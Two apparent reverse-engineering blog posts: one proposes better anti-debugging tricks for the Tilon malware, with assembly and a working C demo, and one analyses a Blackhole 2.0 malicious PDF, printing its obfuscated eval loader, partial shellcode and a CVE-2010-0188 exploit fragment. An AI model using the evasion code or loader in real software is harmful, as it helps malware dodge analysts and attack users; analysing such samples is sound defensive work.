<span style="font-family: Verdana, sans-serif;"><u><br /><span style="font-size: large;">Tilon: you are doing it wrong...!</span></u></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span><span style="font-family: Verdana, sans-serif;">Now I will show you one way to improve the trick in <i>Tilon</i>'s code:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">STEP 1. We replace the decryption key with a wrong one and set a global variable (for instance at </span><span style="font-family: Courier New, Courier, monospace;">008D0AB0</span><span style="font-family: Verdana, sans-serif;">) to the address of the decryption routine (in my case </span><span style="font-family: Courier New, Courier, monospace;">008D02FA</span><span style="font-family: Verdana, sans-serif;">).</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">STEP 2. We modify the hook so that it consists of a single </span><span style="font-family: Courier New, Courier, monospace;">JMP DWORD PTR [008D0AB0]</span><span style="font-family: Verdana, sans-serif;"> (this is the instruction that will be hidden).</span><br />
<br />
<span style="font-family: Verdana, sans-serif;">STEP 3. We modify the <i>PEB</i> check (inside the last call before the jump to the encrypted bytes; see the listing at the beginning of this post) as follows:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">008D0A00 MOV EAX,DWORD PTR FS:[18] <span style="color: #38761d;">; TEB</span></span><br />
<span style="font-family: Courier New, Courier, monospace;">008D0A06 MOV EAX,DWORD PTR DS:[EAX+30] <span style="color: #38761d;">; PEB</span></span><br />
<span style="font-family: Courier New, Courier, monospace;">008D0A09 CMP BYTE PTR DS:[EAX+2],0 <span style="color: #38761d;">; BeingDebugged != 0 ? (CMP sets the flags JNZ tests)</span></span><br />
<span style="font-family: Courier New, Courier, monospace;">008D0A0D JNZ SHORT 008D0A19 <span style="color: #38761d;">; debugger: leave the variable pointing at the decryption routine</span></span><br />
<span style="font-family: Courier New, Courier, monospace;">008D0A0F MOV DWORD PTR DS:[8D0AB0], 8D0A1A <span style="color: #38761d;">; no debugger: point it at the snippet below</span></span><br />
<span style="font-family: Courier New, Courier, monospace;">008D0A19 RETN</span><br />
<span style="font-family: Courier New, Courier, monospace;">008D0A1A MOV BYTE PTR DS:[8D036D],7A <span style="color: #38761d;">; restore the correct decryption key</span></span><br />
<span style="font-family: Courier New, Courier, monospace;">008D0A21 JMP 008D02FA <span style="color: #38761d;">; then decrypt</span></span><br />
<span style="font-family: Courier New, Courier, monospace;">008D0A26 ADD BYTE PTR DS:[EAX],AL <span style="color: #38761d;">; 00 00 padding, never reached</span></span><br />
<br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">When the code jumps to the encrypted bytes, the exception invokes the "hooked" KiUserExceptionDispatcher, which:</span><br />
<ul>
<li><span style="font-family: Verdana, sans-serif;">jumps straight to </span><span style="font-family: Courier New, Courier, monospace;">008D02FA</span><span style="font-family: Verdana, sans-serif;"> (the decryption routine), which then uses the wrong key, if a debugger is detected;</span></li>
<li><span style="font-family: Verdana, sans-serif;">jumps to the small snippet in the listing above, which restores the correct decryption key and then jumps to </span><span style="font-family: Courier New, Courier, monospace;">008D02FA</span><span style="font-family: Verdana, sans-serif;">, otherwise.</span></li>
</ul>
<br />
<span style="font-family: Verdana, sans-serif;">This way, if an analyst doesn't notice the <i>PEB</i> check (because they stepped over its call without patching <i>BeingDebugged</i>, for instance), the variable keeps pointing at the decryption routine, the bytes are decrypted with the wrong key and the process crashes.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">In my opinion this version of the trick is much better than <i>Tilon</i>'s original implementation, but we can improve it further if we stop tying it to the original structure, which revolves around the exception raised by executing the encrypted bytes.</span><br />
<br />
<br />
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>Another way to implement the trick (my fav one ;))</u></span><br />
<span style="font-family: Verdana, sans-serif;"><u><br /></u>Another variant of <i>Tilon</i>'s original implementation of the trick is the following.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">We set a global variable (let's say at </span><span style="font-family: 'Courier New', Courier, monospace;">008D0AB0</span><span style="font-family: Verdana, sans-serif;">) holding a memory address that depends on the result of the <i>PEB</i> anti-debugging check. Then we raise a suitable exception (for example by writing through a null pointer) and "hook" <i>KiUserExceptionDispatcher</i> with a </span><span style="font-family: Courier New, Courier, monospace;">JMP DWORD PTR [008D0AB0]</span><span style="font-family: Verdana, sans-serif;"> (the hidden instruction!).</span><br />
<span style="font-family: Verdana, sans-serif;">Thus, we have something like:</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov eax, 0</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov dword ptr [eax], 0 <span style="color: #38761d;">; null write: raises the access violation</span></span><br />
<span style="font-family: Courier New, Courier, monospace;">* junk code *</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The idea is to use the PEB check to set the variable at </span><span style="font-family: Courier New, Courier, monospace;">008D0AB0</span><span style="font-family: Verdana, sans-serif;"> to the address of </span><span style="font-family: Courier New, Courier, monospace;">* junk code *</span><span style="font-family: Verdana, sans-serif;"> if a debugger is detected, and to the address of the real code otherwise. The analyst may not notice the "hook" at all and will simply press <i>Shift+F8</i> to continue from the instruction right after the exception, as one normally does.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The following diagram will clarify the procedure:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8IyKRT2pFqx_FeydOdULcjovNjmNKU3ifwQj8XybGl7R6bDlB5LtuKMhFG6RyYc8L4nf5a46-Gxjp1ndUArvfLzYfVZ1-K_yoLDuBF-TFYGoT0z6-lXaP5s9-idpDyPgToQlt4kEFLHs/s1600/schema4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="296" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8IyKRT2pFqx_FeydOdULcjovNjmNKU3ifwQj8XybGl7R6bDlB5LtuKMhFG6RyYc8L4nf5a46-Gxjp1ndUArvfLzYfVZ1-K_yoLDuBF-TFYGoT0z6-lXaP5s9-idpDyPgToQlt4kEFLHs/s640/schema4.png" width="640" /></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Of course you can choose a different (subtler, less visible) way to raise the exception; the point is that the </span><span style="font-family: Courier New, Courier, monospace;">* junk code *</span><span style="font-family: Verdana, sans-serif;"> can really confuse the analysis and cost the analyst a lot of time. For instance, the junk code can do some plausible-looking work and then terminate the process, or anything else you like.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Moreover, it's harder to spot than placing the jump directly in the PEB check, because the jump is the hidden instruction and, from the debugger's point of view, execution simply resumes after the exception as you would normally expect.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Note also that the PEB check is only one of the possible ways to detect the debugger; you can obviously choose a different one!</span><br />
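<span style="font-family: Verdana, sans-serif;">Both variants above boil down to one mechanism: a debugger check writes a target address into a variable, a deliberate fault hands control to the exception dispatcher, and the hook there jumps through that variable. Here is that mechanism as a POSIX C program (an added example, not Tilon's code; it also cannot reproduce the OllyDbg behaviour that hides the instruction). A SIGSEGV handler plays the hooked KiUserExceptionDispatcher, two sigjmp_buf continuations play the real-code and junk-code addresses, and the TracerPid field of /proc/self/status replaces the PEB BeingDebugged read; these substitutions, the Linux-only debugger check and the force_debugger switch are assumptions of the port.</span><br />

```c
/* dispatch_trick.c: POSIX model of the variable-driven exception dispatch
 * described above (added example, not Tilon's code).  The signal handler
 * stands in for the hooked KiUserExceptionDispatcher, two jump buffers stand
 * in for the "real code" and "junk code" addresses, and /proc/self/status
 * TracerPid stands in for the PEB BeingDebugged byte (assumptions: Linux for
 * the debugger check, any POSIX system for the rest).
 * Build: cc -std=c99 -o dispatch_trick dispatch_trick.c */
#define _POSIX_C_SOURCE 200809L
#include <setjmp.h>
#include <signal.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum { PATH_NONE = 0, PATH_REAL = 1, PATH_JUNK = 2 };

static sigjmp_buf real_code, junk_code;
static sigjmp_buf *g_target;                 /* the page's variable at 008D0AB0 */
static volatile int *volatile g_bad = NULL;  /* opaque NULL: the compiler cannot
                                                fold the store into a trap */

/* Debugger check: a traced process reports a non-zero TracerPid. */
int debugger_present(void)
{
    FILE *f = fopen("/proc/self/status", "r");
    char line[256];
    int tracer = 0;
    if (!f)
        return 0;                            /* not Linux: assume untraced */
    while (fgets(line, sizeof line, f)) {
        if (strncmp(line, "TracerPid:", 10) == 0) {
            tracer = atoi(line + 10);
            break;
        }
    }
    fclose(f);
    return tracer != 0;
}

/* The "hook": it never resumes the faulting code, it transfers control to
 * whatever the variable points at (the hidden JMP DWORD PTR [var]). */
static void hooked_dispatcher(int sig)
{
    (void)sig;
    siglongjmp(*g_target, 1);
}

/* Runs the sequence once.  force_debugger = 0/1 exercises either path without
 * attaching a debugger; -1 uses the real check.  Returns PATH_REAL or PATH_JUNK. */
int run_dispatch_demo(int force_debugger)
{
    struct sigaction sa, old_segv, old_bus;
    volatile int outcome = PATH_NONE;
    int detected = force_debugger >= 0 ? force_debugger : debugger_present();

    /* 1. The anti-debug check decides where the dispatcher will land. */
    g_target = detected ? &junk_code : &real_code;

    /* 2. Install the hook on the fault dispatcher (SIGBUS covers macOS). */
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = hooked_dispatcher;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, &old_segv);
    sigaction(SIGBUS, &sa, &old_bus);

    /* 3. Register both continuations, then provoke the exception
     *    (mov eax,0 / mov dword ptr [eax],0 on the page).  sigsetjmp returns
     *    0 when the buffer is set up and 1 when the dispatcher jumps into it. */
    if (sigsetjmp(real_code, 1) != 0) {
        outcome = PATH_REAL;                 /* real code: no debugger seen */
    } else if (sigsetjmp(junk_code, 1) != 0) {
        outcome = PATH_JUNK;                 /* junk code: debugger detected */
    } else {
        *g_bad = 0;                          /* faults; control never returns here */
    }

    /* Remove the hook again, as Tilon does once the real code is reached. */
    sigaction(SIGSEGV, &old_segv, NULL);
    sigaction(SIGBUS, &old_bus, NULL);
    return outcome;
}

int main(void)
{
    printf("real check  -> %s\n", run_dispatch_demo(-1) == PATH_REAL ? "real code" : "junk code");
    printf("forced path -> %s\n", run_dispatch_demo(1) == PATH_JUNK ? "junk code" : "real code");
    return 0;
}
```

<span style="font-family: Verdana, sans-serif;">Run it under gdb or strace and the real check routes you into the junk path; run it normally and you land in the real code, with nothing in the main flow pointing at the decision. That is the property the trick relies on: the branch lives in the dispatcher, not in the code the analyst is stepping through.</span><br />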
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>Conclusion</u></span><br />
<br />
<span style="font-family: Verdana, sans-serif;">You can use this technique on its own or mix it with other tricks. If you choose to combine different tricks, the risk of being detected increases... but so does the number of possible uses!</span><br />
<span style="font-family: Verdana, sans-serif;">Posted by giulia (http://www.blogger.com/profile/12995367052667481710) on 2012-10-11</span><br />
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>Some notes about the pdf exploits in Blackhole 2.0</u></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Recently we have been hearing a lot about Blackhole 2.0, the latest edition of the popular exploit kit, so I started looking around to gather some more information. In particular, I searched for websites hosting it and found a pdf file that caught my attention (you can find it at </span><span style="font-family: Courier New, Courier, monospace;"><blackhole_host>/data/t.pdf</span><span style="font-family: Verdana, sans-serif;">). </span><br />
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">The curious thing about it is that it doesn't contain any malicious code: looking closer, it is only a sort of skeleton for the real malicious pdf.</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">In fact, just analyzing the raw bytes we see the following streams:</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">3 0 obj<<%data%/CreationDate(%title%)>></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">endobj</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">42 0 obj<</Length 504/Filter[/FlateDecode]/Type/EmbeddedFile>>stream</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">%config%</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">endstream</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">endobj</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">43 0 obj<</Length 1313/Filter/FlateDecode/Type/EmbeddedFile>>stream</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">%js%</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">endstream</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">endobj</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">This suggests that the malicious pdf is built on the fly: the fields </span><span style="font-family: Courier New, Courier, monospace;">%data%</span><span style="font-family: Verdana, sans-serif;">, </span><span style="font-family: Courier New, Courier, monospace;">%title%</span><span style="font-family: Verdana, sans-serif;">, </span><span style="font-family: Courier New, Courier, monospace;">%config%</span><span style="font-family: Verdana, sans-serif;"> and </span><span style="font-family: Courier New, Courier, monospace;">%js%</span><span style="font-family: Verdana, sans-serif;"> seem to be filled each time with data related to a different exploit, depending on the vulnerable software found on the victim's system. This is a novelty for the Blackhole exploit kit, as the previous versions did not use a similar approach.</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">So, I conducted further investigations: I searched for some live exploit urls to perform a real infection and capture it with Wireshark. I then extracted the pdf file from the capture and started analyzing it.</span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">To do that I used a utility named PDFStreamDumper, which successfully decompresses the streams (note that some other alternatives, such as pdftk, failed at this, maybe because the file was intentionally corrupted to make inspection more difficult).</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">The important streams are the same as the ones listed above, but in this case they are filled with some data (they are reported in a slightly different notation because I had to decompress them). Here they are, together with a brief explanation: </span></div>
<div class="p3">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">3</span></div>
<div class="p5">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;"><<</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span"> </span>/Keywords(3a3p3p1h3a3l3e3r40233e423e3n401h403a3r3g3e401h3c3r3e3a403i3o3n2a3a403e1h3r3e3p3l3a3c3e1b1i1f1i3g1f1a1a1c21423a3r133p3a3d3d3i3n3g21423a3r133b3b3b1f13… **ENCRYPTED EXPLOIT BYTES** …383j1l1b383l3l1l1c21433i403h1b473k20383l3l1m491c382f1j1b3k1c212f3m3a3g3e2c3i3e3l3d1k1h3r3a432s3a3l413e23383l3l1k49383j1m1b1c21)/CreationDate(6683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5… **SHELLCODE BYTES** ...6363636d7477723d3033303333333034333430383335333830393035266c71786d746e66623d30332668657a6e647865663d746c796d6626717666707870656f3d75777462730000)</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">>></span></div>
<div class="p5">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p4">
<span style="font-family: Verdana, sans-serif;">This object holds the document metadata keys (which Acrobat's javascript exposes as target.keywords and target.creationDate) and thus both payloads: /Keywords carries the encoded javascript exploit, which the script in object 43 reads through target.keywords, and /CreationDate carries the hex-encoded shellcode.</span></div>
<div class="p5">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p5">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">42</span></div>
<div class="p5">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;"><config xmlns="http://www.xfa.org/schema/xci/1.0/" xmlns:xfa="http://www.xfa.org/schema/xci/1.0/"><trace><area level="1" name="font"></area></trace><agent name="designer"><!-- [0..n] --><destination>pdf</destination><pdf><!-- [0..n] --><fontInfo></fontInfo></pdf></agent><present><!-- [0..n] --><pdf><!-- [0..n] --><fontInfo><embed>1</embed></fontInfo><version>1.6</version><creator>Adobe Designer 7.0</creator><producer>Adobe Designer 7.0</producer><scriptModel>XFA</scriptModel><interactive>1</interactive><tagged>1</tagged><compression><level>6</level><compressLogicalStructure>1</compressLogicalStructure></compression></pdf><xdp><packets>*</packets></xdp><destination>pdf</destination></present><acrobat><acrobat7><dynamicRender>forbidden</dynamicRender></acrobat7><common><locale></locale><data><incrementalLoad></incrementalLoad><adjustData></adjustData><xsl><uri></uri></xsl><outputXSL><uri></uri></outputXSL></data><template><base>C:\</base><relevant></relevant><uri></uri></template></common></acrobat></config></span></div>
<div class="p5">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p4">
<span style="font-family: Verdana, sans-serif;">This stream is the XFA configuration packet: rendering options written by Adobe Designer 7.0, with no script in it.</span></div>
<div class="p5">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p5">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">43</span></div>
<div class="p5">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;"><!--&lt;template>--><template><subform layout="tb" locale="ru_RU" name="form1"><pageSet><pageArea id="Page1" name="Page1"><contentArea h="10.5in" w="8in" x="0.25in" y="0.25in"></contentArea><medium long="11in" short="8.5in" stock="letter"></medium></pageArea></pageSet><subform h="10.5in" w="8in"><field h="98.425mm" name="ImageField1" w="28.575mm" x="95.25mm" y="19.05mm"><ui><imageEdit></imageEdit></ui><caption placement="bottom" reserve="5mm"><font typeface="Myriad Pro"></font><para vAlign="middle"></para><value><text>Image Field</text></value></caption><border xmlns="<a href="http://www.xfa.org/schema/xfa-template/2.2/"><span class="s1">http://www.xfa.org/schema/xfa-template/2.2/</span></a>"><edge presence="hidden"></edge><edge stroke="dotted"></edge><edge stroke="dotted"></edge><edge stroke="dashed"></edge><corner stroke="dotted"></corner><corner stroke="dotted"></corner><corner stroke="dashed"></corner><fill><pattern type="crossDiagonal"></pattern></fill></border><event xmlns:xfa="<a href="http://www.xfa.org/schema/xfa-template/2.2/"><span class="s1">http://www.xfa.org/schema/xfa-template/2.2/</span></a>" activity="initialize"></span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;"><xfa:script contentType='application/x-javascript'></span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">with(event){</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">k=target[/**/"eval"];</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">if((app.addMenuItem+/**/"").indexOf(/**/'native')!=-1){a=/**/target.keywords;}</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">s="";</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">z=a;</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">/**/ss/**/=/**/String.fromCharCode/**/;</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">for(i=0;i&lt;a.length;i+=2){</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span"> </span>s=s.concat(ss(parseInt(z[i]+z[1+i],0x1d)));</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">k(s);</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;"></xfa:script></event></field></subform><proto></proto></subform><?templateDesigner DefaultLanguage FormCalc?><?templateDesigner DefaultRunAt client?><?templateDesigner Grid show:1, snap:1, units:0, color:ff8080, origin:(0,0), interval:(125000,125000)?><?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?><?templateDesigner Zoom 76?></template></span></div>
<div class="p5">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p4">
<span style="font-family: Verdana, sans-serif;">This stream is the XFA template packet. The initialize event of the image field ImageField1 runs the script that decodes the exploit: it takes the document's Keywords (target.keywords), reads every two characters as a base-29 number (parseInt(..., 0x1d)), turns each number into a character and passes the resulting javascript to eval. The keywords are fetched only if app.addMenuItem looks like a native function, a cheap check that the script is running inside Acrobat/Reader rather than in a javascript emulator that stubs the app object; otherwise a is never assigned and the decoding never runs.</span></div>
<div class="p5">
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p4">
<span style="font-family: Verdana, sans-serif;">To decode the exploit, you can use the following html page ("z" holds the encoded bytes, i.e. the /Keywords value):</span></div>
<div class="p5">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;"><html></span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;"><head></span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;"><title>Decrypted Exploit</title></span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;"></head></span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;"><body></span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;"><pre id="out"></pre></span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;"><script type="text/javascript"></span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;">// z: the /Keywords value, a sequence of two-character base-29 numbers</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;"><span class="s2">var z = "</span>3a3p3p1h3a3l3e3r40233e423e3n401h403a3r3g3e401h3c3r3e3a403i3o3n2a3a403e1h3r3e3p3l3a3c3e1b1i1f1i3g1f1a1a1c21423a3r133p3a3d3d3i3n3g21423a3r133b3b3b1f13… **ENCRYPTED EXPLOIT BYTES** …383j1l1b383l3l1l1c21433i403h1b473k20383l3l1m491c382f1j1b3k1c212f3m3a3g3e2c3i3e3l3d1k1h3r3a432s3a3l413e23383l3l1k49383j1m1b1c21<span class="s2">";</span></span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;">var s = "";</span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;">for (var i = 0; i < z.length; i += 2)</span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;">{</span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;">    // same step as the XFA script: parseInt(pair, 0x1d) gives one character</span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;">    var c = String.fromCharCode(parseInt(z[i] + z[i + 1], 0x1d));</span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;">    s += c;</span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;">    if (c == ';') s += "\n";   // one statement per line, for readability</span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;">// textContent: the decoded script is shown as text and never parsed as html</span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;">document.getElementById("out").textContent = s;</span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;"></script></span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;"></body></span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;"></html></span></div>
<div class="p3">
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p8">
<span style="font-family: Verdana, sans-serif;">Decoding it yields the exploit for the well known <span class="s3">CVE-2010-0188</span>, the TIFF parsing flaw in Adobe Reader's libtiff, triggered by assigning a crafted base64 TIFF to the rawValue of an XFA image field (the last line below):</span></div>
<div class="p3">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;">*REMOVED*</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;">…</span></div>
<div class="p9">
<span style="font-family: Courier New, Courier, monospace;"><span class="s4"><span style="color: purple;"> _j8='SUkqADggAABB'; </span><span style="color: #274e13;">// * </span></span><span style="color: #274e13;">base64 representation of a TIFF</span></span><span style="color: #274e13; font-family: Courier New, Courier, monospace;"> header! *</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;"> _j9=_I2('QUFB',10984);</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;"> _ll0='QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;"> _ll1=_j8+_j9+_ll0+_j5;</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;"> _ll2=_ji1(_j7,'');</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;"> if(_ll2.length%2)_ll2+=unescape('');</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;"> _ll3=_j2(_ll2);</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;"> with(</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;"> {</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;"> k:_ll3</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;"> }</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;"> )_I0(k);</span></div>
<div class="p8">
<span style="color: purple; font-family: Courier New, Courier, monospace;"> ImageField1.rawValue=_ll1</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;">…</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;">*REMOVED*</span></div>
<div class="p3">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p3">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p8">
<span style="font-family: Verdana, sans-serif;">I also gathered some other malicious pdf files and found out that they are always structured in the same way: the decryption script may change a little (for example, I found "0x1C" instead of "0x1D", that is, the numerical base used to interpret the bytes), but the method itself is very similar.</span></div>
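<div class="p1">
<span style="font-family: Verdana, sans-serif;">As an added example (my own code, not part of the original post or of the exploit kit), the following Python script does offline what the html page above does in a browser, and also covers the 0x1C variant just mentioned: it decodes the pair-encoded /Keywords value, guesses the radix when it is not known, and hex-decodes the /CreationDate shellcode (the decoded javascript reads it through event.target.creationDate). The sample inputs are the visible prefixes of the two values quoted above; the full values are elided there, so only the prefixes are decoded. The radix-guessing heuristic (printable output with the most javascript-looking tokens) is an assumption of mine, not something the kit does.</span></div>

```python
"""Added example (not part of the original post): pull the two payloads out of
a Blackhole 2.0 pdf of the kind described above.

It mirrors the decoder in the XFA initialize script: the /Keywords value is a
string of character pairs, each pair is parseInt()'ed in base 0x1d (29) and
gives one character of javascript.  The /CreationDate value is the shellcode
as a hex string; the decoded javascript reads it through
event.target.creationDate.  guess_radix() is an addition for the 0x1c variant
mentioned at the end of the post.
"""
import string

# alphabet shared by javascript's parseInt() and python's int(): 0-9 then a-z
DIGITS = string.digits + string.ascii_lowercase

# constructed sample input: the visible prefixes of the /Keywords and
# /CreationDate values quoted in the post (the full values are elided there)
KEYWORDS_PREFIX = ("3a3p3p1h3a3l3e3r40233e423e3n401h403a3r3g3e401h3c3r3e3a403i3o3n"
                   "2a3a403e1h3r3e3p3l3a3c3e1b1i1f1i3g1f1a1a1c21423a3r133p3a3d3d"
                   "3i3n3g21423a3r133b3b3b1f13")
CREATIONDATE_PREFIX = ("6683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db"
                       "668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e4"
                       "7551e9eb4c51568b753c8b74357803f5")

# tokens a decoded javascript layer contains and a wrong radix will not produce
JS_TOKENS = ("var ", "function", "eval", "return", "unescape", ";")


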